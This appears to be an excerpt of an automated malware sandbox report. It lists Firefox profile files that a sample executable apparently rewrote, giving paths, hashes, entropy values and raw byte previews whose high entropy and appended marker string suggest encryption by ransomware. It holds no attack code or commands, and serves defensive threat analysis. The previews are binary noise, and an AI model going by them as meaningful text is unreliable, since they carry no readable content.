                                                                                                                                                  Preview:mozLzZ.....^_o>...2o....x..5...p.(.0..S.>.&...N..J.kd.$..K........%?....?V....XW.n..V.W..y.`...V.s&....X3\.q......?..Q@......1njn.E!`.&...=.m.Z....R...5........Q.E...>.1qB......1 .....CYLA...o.6..._..A...O......SOA.V.B#R.....va....fB..s]o.._+1l)........d.h.(L...G......fX...t......0.... ........sP..aqP..... ..J..q......6....rE.B7..4]...cK......M'....C..Pe.^.)....sN7.....N...E.p.]..$...)".6...!.R.;..qN.&.~.-....d....`...o.........|.~%....HC.U."].Q,...fU...\'..;)K...rY.|..k.E...7'...>}E...Ua.Af...^n...es?C..A....J.....-.Q!......MK5v.Wd....].-.d..b*.T@..M.....".....N...d.....D,.2.|[..M.ED]r,.v;......T\RX..f.0....GH.F.n.0.R.H2.w.....`.V#...D{() .*...,3.e..c .8.k;.dm.t!..}./........R.6.....\.u..._......}..7...v%.g.i*.a.R.^>...dL..5..p..)..h/2.{(...JOo....itK..A7....-..;.F..aW..}G.D......'<.RUJ.=.o.(.........x.....^.).....(.O....4.K(...Y.F...b....b..G.....do....3..6B.........vTB...w/vz.#..c/....o.\.m.%...RqY8F.._a...]K5..i..%6.(.?.

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503513571.e8b29a6f-8340-4314-aa45-e868999caed9.health.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):779
                                                                                                                                                  Entropy (8bit):7.704209941467234
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:fVtaTiIgHqbIrB3T2rWMzuLfX0Z7LsIHoPcADx8wCKmNTZCTrJugR4nwaWSUdNcq:df/B3KxzubE1zHrDvKmNIn3u3V2bD
                                                                                                                                                  MD5:2546B4D0B6BFD7CA7A45EE30F07C7EFF
                                                                                                                                                  SHA1:562EA879F4F3BEFF96EFF733800EC8586D46A401
                                                                                                                                                  SHA-256:70F11E4AAD346F3A5838B4BDFB1B38B13C645E0BF54886C3EC2AB087539FE666
                                                                                                                                                  SHA-512:62AC8DD94D3622552ECE85A764A0CB88348D107BA4373F59C2D6A381E43C2428E4E1E56FEB2E590C1703324F805581D6B21578F5956EEBCF8AB8DB7D6E431066
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz.;T`;...Q...;.+.....Ed.R.!.y'.2.5#u...A.a,..48.X-.F..._.m`w#..S.7...J...P..^c..8..:H{.dRe.b..s.....E8p%....{....Y.4mQ..:.&Sz../.L.3'.....W..E..|...Q.v....]....i~m.....]x....GGWU..;..Y{2.<H.x2..6......b..Y:.....{..:4o...7.........A......1 .B.....8..N..7....7tU...g.av.tc.....[........n..W...%[....)v.o.j.Y...`..4...Y.L`....0........*....oS..^..M.".....y.R..9....e...C.l..,dXZ.BXI.....F..w.....j.K.bm{....;-\....{!.F...zY,....w\....R...I..w..\.RY.j}4.`..F.j....=....^......EW..J.=_=.6...=}#N....L....|m..$mt..D..u.l...T....-.......X.i..a....b...=7...x.s.d.....x.H.$8.....M.U.P4....1..D9Ke.....K.......l.......w...^z.yq#....r4.....F..............i..J........3f..J{_.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503513604.61a14900-8c70-4dde-805f-8a3f6d6f547f.event.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4770
                                                                                                                                                  Entropy (8bit):7.964943612197514
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+IMR2eB/wPJEEPR/5fZ01USsjGnuQqmErxu5rteYaqgJQPdup3jzmNL8W7s:NMkCEPR/5u1tWGn5teYznq8L8X
                                                                                                                                                  MD5:4312355EDFBF1C02B0777AA2E1E7E930
                                                                                                                                                  SHA1:91604C693539AF3401154C1DF61E63F93D2ABDB8
                                                                                                                                                  SHA-256:668D3AF2FC3895A821895C058BB7D6440157F7CD4057129CEF621082789214F8
                                                                                                                                                  SHA-512:58CCF741685676550757D048E55B64A5F83C0BF8A61F63E9628FC8FC42C7772918B4EC5DBD0F9A27116D78FAEE56F5004DAD6527C29B09EB8B48C0966E0F696B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz.*...G.Nj.xT>.....4..H..I.....N_..#..j...t.m ...3N..........r...oCi...E.~.*S3=Xb..zuk..v.....Ii:..tt..".....Z.x..N..A.h.~.%_O*. ....P:.r=.....{wY...5.6K0...0.T......A.....Y.....Z.......h.;.o....M.o6...<.4...].kVm.........Jq.r;........!.<...rF.VM...T.K.^.Z[.]1.b...T.......39.9......|..$.Z...M.h....!...8zvy..C..i...U.o|!q.[..n..0<......!u.-.\(...(....*bES............;RaF. W"V......I.'/+.@_0`..1E.c{......B..1D#.Bpy.....n^........^.......}9.`....Q_...;...[.i.T...EC....4....to....!....,1...ok.K...9....G.XO....@..?...M.8".u33<...i......q.`6K..Z..l.p|.'..yQ.s.)...m..j#.8,..._.g.....~..],.}.I.H.F..i.M..)...?..C........'...q.^...G...~.z.s.d.{.u...e:..V.~H.U..?....5..i8|%..q...*<n.j....tE.E|...{....iZ-$...`..s8-..r4.o4$...iMV./.~...K.%.v.O..w.F.m..Y1...+j\Q.....^..1....!#Q\.G...:..Z.......S.,.Y`....|>...y.V.n.)k.P.[.8..D..l...o..gE2....~x....,..).z.\`...Q....2.`..A....f...&Y{W...f.y....R}x......G._.?#..X...... ..n...U...}.....M.`>.j

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503513605.0b8e5024-43d9-4b29-8d44-b2128589e9a6.health.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):778
                                                                                                                                                  Entropy (8bit):7.709055724060082
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:bVNxQwhInwnIQ674bma4WUzQfYqdm4X42bD:bqwhIwnJwWrmkD
                                                                                                                                                  MD5:185E9EB12BAA26A38A32C90B0248409E
                                                                                                                                                  SHA1:B88756E1BAB299E5154B6FD2E12CE28EE3833077
                                                                                                                                                  SHA-256:A39A24723DFD2F117DA011723D96AD19D29E745EBE463D49C3B19B0FD5840734
                                                                                                                                                  SHA-512:38A49D3F5D9C9879EC479981D1FA9F06FFCA46714ECA43A98435DE695264BAF23983571A22C3B059881CF243A96F450E63D53ED2AD143CF8B9BD5DDC105E3E3F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz..=....?.;...`.k.S8,.7+.q..3.J.Z...q..x?~..`Z9>2...7.8.p.../..rU.8q.$J.....K9.\.L}./.Z'.V.o~..{.... R8..1..M.......d.3.~........./..z.f..9]8M........L...rCy.>J4Rz....|x_M.....v.BX.*...p.=0e......Rt.....t..Y..Q..G...U.<.@...3....2.....A>5W....<~PV..._.32..8.@v.........,%Z....~Rc........./.Z.q..p%.g,.>.....6....5W....\8..2U.'.PPvlvq.....Y...H.n..,....L..evH.z...9..^..0...}+...}........0(pK.;.+.#OO.W..13...Q.|.^..../..?.G.q.M...2I'..........W.G.S..^.?.gnW....aS........SX.W..u...........a..X.[....>Q..v......%....3.......GA...k.]..D.E=M<N.....1.E.j...`..'..i.iV?....W..s+-.X9EpN{f.c..6N.pAvA.$..G.[...)..C6}..b..V2H..hQ.=cS..J......m.x.~o M.......m.x.&D...c.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503513624.2fefa2f4-1344-4424-9531-b97121e6ea8b.main.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):17381
                                                                                                                                                  Entropy (8bit):7.990085267341031
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:6J7a+RK7iFFQoFz+0I/yQV1klrWsezkbDGTfc4J3oyrf6aQ8byQHFfHf:w7vRkEQoF3DyzsDDGDcY6a2QHpHf
                                                                                                                                                  MD5:BB325B1C8847A32CE18F7990083677C0
                                                                                                                                                  SHA1:14B8BEDA79B21006251CD031C2C9065E4069C39A
                                                                                                                                                  SHA-256:13099C04A443702B8C981E42F44973FBD79424AF9291671E1EF3D4C1212DBAF2
                                                                                                                                                  SHA-512:B7A058209BF5202202AECBCBEE97A794364FB9D817C7DC9B4DC671B44A845DD3FF118DDFC4134CEC28BF4289B4ABA98F3AC58A8384431B3A0CDB9D25C9137BFA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:mozLz.N.*.-.1...O.G..Z..{er......6...=0..]...s.y.q.l..,d....f..w....#...b....6..E*......9T.pVz5.........gd.Z..`..E$.r.J.q..P.F......~..64..f...@.G...ls......&..[.e.Z.hno..U...:.R.b....nS%.G........%8.p!J..*mh.-D..2.[.6l....5.w..=K.R.nsd.#m.\...'..C.Q..".....Xlma.E:....bZL..a......K.......)7l..sx.Nb9......dy....S-,DL..7.D.&....S..A(oM.S#.[fr..ic.DG:.p...<.-.f...#.*..](.IW...C.....|......:..e....Ur/.[.V.0...0C8...e3...8..?..W.r.....V......./@.5.xf.s..=.M.....V../..D.<U.wM.g.Q.r..P.,...^L.o.....(yC..R..L..:.3+....../9.0z..):.*.a.#u.:..L.!............@..H.Aq3Dx...1Wl.....V.|...HS...A$+T..E.......w...i..u...(..O...."U~.S.:.U.."E:...i.o>..e;].F.........I/-.>....j m.<...[_("..B.=...............&JF..$./.xq..\*......C..,(hN.[.p......f...C@g.[."..5.UpQ....*.i|....X.....H5..k...<2P..T(.C..|.....F...sS.3\9K.. w...-t..&.\.&j....A..i.1..Jmp.d.^....N......."..).......L...=BfBO.t\..\J".....Y.H.4g..7x.........l.*(w@...i"...:....{....Yj.MQ._........B...K.-

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503526248.6239d2a9-a75b-4d04-9f02-ff51a9a6c67a.health.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):778
                                                                                                                                                  Entropy (8bit):7.717678747619923
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:e5CvTVwSHEy8K3ok9NMomsePiwU0qqMj3fpTYPAnxFIUQNSqbb5/d32yonAeSUdV:NuSxYomsePtMj67TbL32yZN2bD
                                                                                                                                                  MD5:4ABCACAE15CEBB3CB412F11EB5F2CAD0
                                                                                                                                                  SHA1:A7BDC9700965AEDA6A0A9EBB60A2AC93CD1C56F3
                                                                                                                                                  SHA-256:29B4192A4C9DE8C021401A232A3FB8E327B0A48E8CD04924781AB7A3B3C78004
                                                                                                                                                  SHA-512:EAEE4A62B8EF5F3EE29B4993D51A072F0BF0BC560C7B4459F69DBB71B4A2E8C93DE496929A7C3D6E71AF9525B7C913CC655BE3638C779285F2D4BC36A4BD8978
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz.%d-...=q.n.........I..y.....FYu....?.z...M#..xU~..Rvv=..@..H;Wl...k..(.g..emq...?t.<|..L$.^..8......:.......+..O......H.T....Q:...+.....H...Q.5m.{.)..I.....A...&.F...Kz..}R..vw.".....+}s.).<....(.L0......e{.P.WI....... s?.J~.8S?....W..e...(...N. .....`O.l....Z'..i,...9..8......K........pB...].w~.p......Xr.8dI..G..KM.o.L...-.pD...K-.._...X...{..PD.#.{.......`FF..........9..A..,...3........N..N.$..#...V....m..M.={.ZE..~..e...\.A.%I..:X.l{.C.3...qh[..lp...R..t.qx.U.`P.\E1.w.v...}_M..'..._y.R..?..&J\..1.z.k...i........m..k&.......s.....L.aq.u...z).=..d..z...CK9i........;..~*c)...].i.......J.......9.*..js.(.pS.x9).d..V.j.W..r;.7D.l]Au..O=c.6......&*.9{..QmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503526304.990f4e28-a3dc-4bee-aaf9-f7f8e123be93.event.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4634
                                                                                                                                                  Entropy (8bit):7.9609587368160115
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:NADFhn7Imh3FkXORzGJZ7mbyqH+EWzdAJebI1dOqIxxY0Ao:cFF7Zh3WXORyJZ7m1H3JJdixxJAo
                                                                                                                                                  MD5:A909ABB847A3DBCA11FDFFD3A1B33EC2
                                                                                                                                                  SHA1:527196D4BC30F33BEA97AAF92E505EF6AF844198
                                                                                                                                                  SHA-256:972DE3A4310889E6AB04841B8400534AE03D8BABC8055028849C2E44CED4D148
                                                                                                                                                  SHA-512:23D3FC3B5F5C076D5FB4EC235494C7C0B5230C176C8E4E49235FA1AF051FE16C60568A157AFAE7AD25EF1E660743C8E72F33641656518767BC371EEF2520750A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz#..|4.k..T.x_....:...%ie};......p.. ?3..f......)..h...6A$...O.a$..Ci...........Wo.u..\...P...qV...{..?..`.......50..\..O,. Zz.E.<.I.X...:3)...H....r..?.y-o...d.o....^..~.M;.\.X...N.].a...9O|?..Fd[...dN...0n...d........D^.~.*.......|..0...!N[X.......Z.._u4..I.......F..:.-.V.[...P...70..>.|...f.V..K..1..d.s./..-Ka$.EX.n..y...w.R...jOF..,69_.n.:...|Y....1.h.........k.~.&.......2F..d.jC........@T...;..du6...,...0.3..y....X.1..h..=...)..}...H.O.c....V..=..i.Q......J... .b.b].6.....h..j..Lt..s.&\0ajl...p:.#..A.P.b....&/..u..rT.~.b.L>...-..:..`.......)...\2.C.6..`.].gk.y.I.:..k...!+/z].Z..B....c<..D.{=.f7...%.W...3.....*..8...XR.H._..#...].....bg..0....{^P.I....Q........I....m..7I.....W...c...S.-.U2>......9...[z.%_.b......[..\..I..y.:.m.~..v......}[5...S}...)>N.....fa5S\#.....~. ..FF..........:|..b..u.C.[.i(Im.M.I..&..B.0...ni.q.....C...a.*....5.......M....6..,2_......b.._7...r.b..~.`k|YL.H.%/k..Q86.....o.....l&.|.R.$C...3.._)..!mZ...o..

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503526304.da35b044-d579-4545-b54a-ea539a7ed843.health.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):779
                                                                                                                                                  Entropy (8bit):7.681557827822707
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:/uyw7aVQfkiavfhjloUoY4xuyv8VoGnxqoU0h2bD:GyOaVQ8i6loPRv4oGtUhD
                                                                                                                                                  MD5:E649195BBF04ED047537AF7FFA96D6E1
                                                                                                                                                  SHA1:DB46253F516D2A5C255A6F6B0C422DF94804F50E
                                                                                                                                                  SHA-256:6A7631AEA9E6F30A27C7B32CE19E5971903E7943870771B1C2F7DA279AE42882
                                                                                                                                                  SHA-512:5CA45CFCA13E1CAB52EC8226713A780370BA03B5FBDAF33A8E6F9BF667CFDA22D5F2E09ADC0A14919060F3AEB4721089C380CC0EBE41806DBEC11B1967AEB55B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz.)J..|..w.l,......Z.."\D.B....i...y.g.........I..WKDc...SL..k...j8....baS..>!.....?.a...9.W..).fZk..<..w.._.G.yv.uf....C.D#...4..f.......uQ.!b...4v...Z..i.*..c.M..Z.1..y.Z.S@.gXH.#..$..E..>..k,....4z.q..P5%,.Q.ef.\....(.$....._...G.."......M...rJn..#Q.^n.:>o^O.R.%..x...X..._.......V:....F.=.s...%.*...p7q7....:.-{."......\3,...#....{..r..w ....?..}Y=..d....4.CeK.......f...m..{.....N..pP..C.9.=M.&`..x.?..,f...ecf#...0E......$...a/.3-.W.$..`....s.88..?.....w..r.`.g..[$/ .p....[....#.I&r...7..f..J!B..6.....W..\7...=.*..q.M?....4.9.c.o......Lx.|.g....5......g..mR.....i..%N.L5..}(I{...Du..#......b.`.V.7.tko.....V[^JZR..<.=8...j./.........,,.!..1....V.i..i.QmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\archived\2023-10\1696503526318.6a4e4327-b79e-4529-8bcb-d12b80df7ecc.main.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15065
                                                                                                                                                  Entropy (8bit):7.987848720002433
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:GVjJvk8oxAUX4LsQP/aKuElgYT/FjHC2YArs0:AVPQAXssSOlNT/1OOH
                                                                                                                                                  MD5:786FEEFAB6378C4C671DE9825D1E6A03
                                                                                                                                                  SHA1:8552672FF6A9DB73EF2C670C9A890CAF0FF4F156
                                                                                                                                                  SHA-256:6C6A101A77E1B55653B10BFD2304387C19E2AE717DD2E96E2A29A547770D9F0F
                                                                                                                                                  SHA-512:1337A1EA996B9D2794DCF59AE2F3C8174D4309E6B1B690BCF74FB340DAFAA3B895B627E9BE0A21C8739482B258D9B96B6C7867388A7D449ADD049DCB4ED7F959
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz...~d0{i..}..?..'.D.`FM..d.)..b.=8.L.W..;%]B........zb.]...\.U..S:..}.i...(~....j....A7V.^..H....o....^.zN..^..U..*.>p...-.Ss.....3..P`s.....A..U.....B{FFx....5...........5X...P.+.?...}e...L...u.\...{S.Xh5.......RCO.)x#.....s~D lW/"...CF.m...a..k9..k.N......HJL..:...E=.../.dY.F.:A......-3.b.r.d.....`..P.+E ..>...D........N.n.+..,..!....IQ..*.....K.. ......Y.....\....N....ag7B.....~.N....d....j.. /...\~.4zp..@......^....v..R...I.{.8&.bi....SN..\..mw...VI.#........4..c.S.......t...........].....bR._..m......O...-d....K..;....0.T.!P....k0.DVX.v..P].j..>...l....p..R..M.....D.J..re$.[.K?.....rg..E..+Y.S$.V..`m..oG..e..6.F.)....nrF...R....0.E&.m<K.....[..zC.`.. .:B?..M...m..tG.........:.5...J...I..z.(.x.3.....Pl.wN..N..{L"..UG..xD.....E.....C.....gc[.{2...Hj...U..q....Iu..,...t(.6........G.Lpm>....tp....I..y...7&h.@.sO.J...cK.=x N#...1I.2...v........W$....M.s....>..Y.K..(.W.........9...U.[..G.91.=X_.9...P's..fn..`.tS..US.......%

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\glean\db\data.safe.bin

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):14129
                                                                                                                                                  Entropy (8bit):7.9872805731447345
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:nkSO4eRsw2j/vT4p688P7h3d/kzYq0fa+KnVWTk:nkSDE6l7hhkzYqm+0k
                                                                                                                                                  MD5:4F06DECA5EF1DBF6F72266985CB92662
                                                                                                                                                  SHA1:B5716CA9C3593BC711DE71DB6D30078242F086E3
                                                                                                                                                  SHA-256:E0B245EC73B4AFCB7BD5E461F2B997D4EDA012C925857B89B61CD4CC5627DD53
                                                                                                                                                  SHA-512:77CCEEE658E5ADFB31CD60999EDE1423267BA62152DFD62F9AC269F069C81C1648B6F8EB498108F41824C6CD9CCC618D7BA7FF6322AAA3909067BA548CC88487
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....1...G....L~.2^.E.M.]4...K8..Dy.j.4X....^N.9.F..G.g.fL...B..1+%.(.O..j.f..L.s..C.,.>.....j...!./f../...#..F...T.%D.G.L.%..x..x.R.p.l..&..p...RKz..6G.b...g...L%........@..w.`.-...G+?....0.u*.,.R.....6@.x.3.......y.p*(...d-...3...C.0^`.....a.....-.c.W.^~.e..;......W...n.V..3I...`8.LX.'..Riw.)....c....;..d.........c...`....~OldNS.8.......s<....'.kSE...|...&....~.\.!t.b..*.>.m..O.f......=Bx!..#..~%s]t..../.8C.@..*D..*...T..sm3`...BN........z.Ka.N.+.c].!......UU.A>...c!...< .!.i.{.........w....{.9..."....O.@-.H.C}>.fQM...nB..&.[...?Y....yf.f.k....r..f..N...\&M.Y...2").c.?.h.wN.f.EG.>.Z/a|.].s~p..nS....U.G<.7x.j..=..>.Zw.[ngqY.....<<..5{.C.....2M..D...l3.v....[T.. ...;..I.,3..bS`....tX.q..V.v.*4..I.]E.....5..@...6NN.b.3....\O.......W=.....0......(j)....f.RR..`}m..G..T^...F.p..?....G.'...R...HVf.VdnY.n..QJ.r0*Y.P.....E.j.g.@n-.#..+...U...#.......n-....u........0.....R..r#&%W46....c.{...O...(Lt~2..3-....}E.ZU..~..^.....d..s...<\.c

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\session-state.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):495
                                                                                                                                                  Entropy (8bit):7.522855505264219
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:YWnLW7sjsMhSYSFZDzwbaPI53GvVBee8irSUdNcii9a:YAW730C9zwGV4eHG2bD
                                                                                                                                                  MD5:A56BEA99AC54FA46ED2C6165BB8CBC76
                                                                                                                                                  SHA1:899F9CB76BEFAC97CA23198A2246215C4B16524B
                                                                                                                                                  SHA-256:9DB852F4B4D3762B8B0B35D2B4E3710EBCF7A96211BDF953BD7997B65A97D47B
                                                                                                                                                  SHA-512:AAD9EB1D0A4322C89F1170C2933689D7B580FA4C3D5F5B6033B0F8E26BC7DAB9A8AD6D116BDBF776541F9D2B1E502EA8B2B3B7B537611751A9525297FCD6D056
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"ses.....:..'PQ.P.....x...(@..Z.$.q.....=.A..l.I..=}.......`.)..S{.*W....nv.V...o.\@..V...........*V.G...4A?.....7..Pq.p.l.....X.?..xU.]@...~....xf.. @..+7...O.b.....#2...........s...]x..VV..`-.n....rDrI-.o...........k.....E.@...^.>A...g``.iT..k>.IE.rrf.".w..A........j...Vw...F...w..A..h.......<....b..P..u/R.y....#.RQ.)..M*N...2z...-#.V..).....%m.c..........."..e...Q{...G<i.e.;..4.....:.SmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\datareporting\state.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):385
                                                                                                                                                  Entropy (8bit):7.400014776155087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:YGAPN7MgCUMczfWiChsAG5EpJazSUdNcii9a:Y3GsfWi5apf2bD
                                                                                                                                                  MD5:2ED8AA39CB9BB51FEDA1A04F02AC26C2
                                                                                                                                                  SHA1:16DAF672E725567D685CA38F8F90B2D140D5A0C9
                                                                                                                                                  SHA-256:505179BD6BE5CC868BBB426BA95D376CF540C258D85E39BA59BBDCEF89C0A8A2
                                                                                                                                                  SHA-512:5A5582BA6BA249448A4842C6A05E8F5AB260EE140A8C150BC9B42E109AB39664C01A7712A9CD6C57428E45202747ED54C058C9A029F8CE7B1E87EAC708D42CA1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"cli.....[%.zjkm`..G...'...f..A.`..d.....)l|#...H.o...5nJ...&..V..[.d.....b..V*.8W..S..{7.h~..I..^.Z.0.8.wa..%.)M.\.1..`.....^zq].G..^.|p..A.......o...(..1.D.M_.....b...9$..A6..^...#.I.....;je..i..2G...{.J.4...d.....M..@.1.....c..;.....Uz....{>. ...Xo.w...k. ....>ma~."..n.R.pY..W....$...U..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\sessionstore-backups\previous.jsonlz4

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1554
                                                                                                                                                  Entropy (8bit):7.878917647895407
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:hBw/JXAyJLsHjuGG0ACZQvX+lQMbA7V2sDavD:hiNAyJYHjIcQvXzM/
                                                                                                                                                  MD5:667569508FBDF78C01442F6022508B55
                                                                                                                                                  SHA1:144B620293E73EB231ADE05E48C3E9B746BB2014
                                                                                                                                                  SHA-256:793999ADC15BD972A10A6BF46A79F57E2F6A49F1AFEB4D5D079E2EEFE3409482
                                                                                                                                                  SHA-512:A2277008A96E16C756BA1E6199B119B7CAD3755EE9ED5951CEA3D00CDFC36771F089F96E841F019EC3F3DD18A5E727442B27405F6329B46856D343A1881715BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:mozLz]V.A....\.a..Q....".o.z....|...+./;..xc."N...?c.N...!|X]...^xh.-.m..M$.fQ.b..r....@...-l..n:mh...../.w...j.6.$.b.DDy.yx.(..@.r..`Z$.y....3p.GH_..ML.8..%4.......%.d....>.(..'}.m." Y5.....|5....H.<~"..m...dJ.....:+....o.Z.h._..ZG...?@W...N.B..{O.gk.v....Y...]..-..YU.<....>pJ.v~......(f.W...=...i..g.s....u..,!F...{*....F#.l.Lt.....r...>..,.H.....*....@..i...9..?..{.+.*-..B.Kk.Y.C.~.N...on3.$K..uW.r.C3.g.%...%-..F..L...B..(P...........THp;;..b..!.+.".....{ps.4....l...>..]$...3...6....`.^...S...../..cq.w]w..?fdI.%.#sX..%e.....30......[>*X.CG..B........./.1gI..k7:r.S[.&..............{.<...).dJjB.......AX....VN.K...%.=.`.:..B.^...!.Cyk..........H*N...G..eT..`....e......@.~.|H.}._Jx(..e..>E.X'*.F.@.5.#ZZ./a>.....4.b. .3...M.A[.U.M.....]D.Q....{.<9.. ../o.....j.T.A.Zs`E..^\.\.G..(Wx.a....W.....W.u ..c...v`...Pg.u.%(#.Eiv@...H.K.3...{...(....1._pT#...<..fp{~.bGZ..5...4..k........C....o|(..M.T>#...7M..p.>..^r.4.m..@.:...Z='.).|.q...0...vJ...

                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1806
                                                                                                                                                  Entropy (8bit):7.908023933541686
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vU/rlGgrPsJN2z9MXMQ+8o87vzCvP4Fg1D:vspLsJN8MC8oIcP8gN
                                                                                                                                                  MD5:2046C94E1EAD6811D80EB624BB63BE18
                                                                                                                                                  SHA1:F689B4F059113564A76E6605029A7DFE2AF241EA
                                                                                                                                                  SHA-256:0924BDBCC0E486C01AF2F1D9A5A508539B5E81C649F2D28F55447F184903E7B1
                                                                                                                                                  SHA-512:12C5E46B77FE2976505D59309AFA0A12551EB29DDF878D70142B15778BAF4D754768D0FB74332BFED76AC63264973EB5BA8B63883E2E32186CA9FA25E79B34C7
                                                                                                                                                  Malicious:false
